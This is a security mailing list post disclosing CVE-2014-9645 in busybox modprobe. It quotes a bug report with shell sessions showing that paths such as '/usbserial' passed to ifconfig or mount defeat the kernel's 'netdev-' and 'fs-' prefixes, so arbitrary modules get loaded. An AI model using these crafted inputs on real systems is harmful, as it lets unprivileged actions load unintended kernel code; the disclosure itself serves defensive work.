oss-sec mailing list archives
busybox CVE-2014-9645
From: Kurt Seifried <kseifried () redhat com>
Date: Sun, 25 Jan 2015 20:25:02 -0700
Just saw this, I'm guessing it affects all busybox: https://bugs.busybox.net/show_bug.cgi?id=7652 Mathias Krause 2014-11-19 21:22:25 UTC modprobe uses the "basename" of the module argument as the module to load, as can be seen here: bbox:~# lsmod | grep vfat bbox:~# modprobe foo/bar/baz/vfat bbox:~# lsmod | grep vfat vfat 17135 0 fat 61984 1 vfat bbox:~# find /lib/modules/`uname -r` -name vfat.ko /lib/modules/3.18.0-rc5+/vfat.ko It should instead fail to load the module -- actually fail to *find* the module. This can even be abused to load arbitrary modules by nullifying enforced module prefixes some of the Linux kernel's subsystems try to apply to prevent just that: bbox:~# lsmod | grep usb bbox:~# ifconfig /usbserial up ifconfig: SIOCGIFFLAGS: No such device bbox:~# lsmod | grep usb usbserial 32201 0 The actual modprobe invocation, done by the kernel was: /sbin/modprobe -q -- netdev-/usbserial Due to the bug, the "netdev-" prefix including the "/" are ignored and the usbserial.ko module gets loaded. The same works for filesystems, e.g.: bbox:~# lsmod | grep snd_pcm bbox:~# mount -t /snd_pcm none / mount: mounting none on / failed: No such device bbox:~# lsmod | grep snd_pcm snd_pcm 88826 0 snd_timer 26606 1 snd_pcm snd 61141 2 snd_pcm,snd_timer This time the kernel called out to: /sbin/modprobe -q -- fs-/snd_pcm Note the "fs-" prefix. Comment 1 -- Kurt Seifried -- Red Hat -- Product Security -- Cloud PGP A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Attachment:
signature.asc
Description: OpenPGP digital signature
Current thread:
- busybox CVE-2014-9645 Kurt Seifried (Jan 25)